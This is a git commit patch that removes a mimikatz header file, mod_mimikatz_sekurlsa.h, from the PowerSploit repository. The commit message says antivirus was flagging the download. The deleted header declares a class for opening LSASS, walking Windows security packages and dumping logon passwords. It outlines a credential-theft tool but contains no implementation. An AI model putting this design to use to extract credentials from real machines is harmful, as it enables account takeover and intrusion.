From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001
From: mattifestation
Date: Mon, 3 Feb 2014 17:13:35 -0500
Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit.
---
.../mimikatz/modules/mod_mimikatz_sekurlsa.h | 64 ----------------------
1 file changed, 64 deletions(-)
delete mode 100644 Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h
(limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h')
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h
deleted file mode 100644
index aa05d58..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h
+++ /dev/null
@@ -1,64 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include "mod_memory.h"
-#include "mod_process.h"
-#include "mod_text.h"
-#include "mod_system.h"
-#include
-#include "secpkg.h"
-
-#include "LSA Keys/keys_nt5.h"
-#include "LSA Keys/keys_nt6.h"
-
-#include "Security Packages/msv1_0.h"
-#include "Security Packages/tspkg.h"
-#include "Security Packages/wdigest.h"
-#include "Security Packages/kerberos.h"
-#include "Security Packages/livessp.h"
-#include "Security Packages/ssp.h"
-
-class mod_mimikatz_sekurlsa
-{
-public:
- typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in bool justSecurity);
-private:
- typedef struct _KIWI_MODULE_PKG_LSA {
- wchar_t * moduleName;
- wchar_t * simpleName;
- PFN_ENUM_BY_LUID enumFunc;
- mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pModuleEntry;
- _KIWI_MODULE_PKG_LSA(wchar_t * leModuleName, wchar_t * leSimpleName, PFN_ENUM_BY_LUID laEnumFunc, mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pLeModuleEntry) : moduleName(leModuleName), simpleName(leSimpleName), enumFunc(laEnumFunc), pModuleEntry(pLeModuleEntry) {}
- } KIWI_MODULE_PKG_LSA, *PKIWI_MODULE_PKG_LSA;
-
- static bool lsassOK;
- static vector> GLOB_ALL_Providers;
- static vector mesModules;
-
- static PVOID getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind);
- static bool ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine = NULL, BYTE **buffer = NULL);
-
- static bool getLogonPasswords(vector * arguments);
- static bool searchPasswords(vector * arguments);
-public:
- static HANDLE hLSASS;
- static HMODULE hLsaSrv;
- static mod_process::KIWI_VERY_BASIC_MODULEENTRY localLSASRV, *pModLSASRV;
- static PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable;
-
- static PLIST_ENTRY getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind);
- static PVOID getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind);
-
- static void genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst = false, PDWORD pos = NULL);
- static bool getLogonData(vector * mesArguments, vector> * mesProviders);
-
- static bool loadLsaSrv();
- static bool unloadLsaSrv();
- static bool searchLSASSDatas();
-
- static vector getMimiKatzCommands();
-};
-- cgit v1.2.3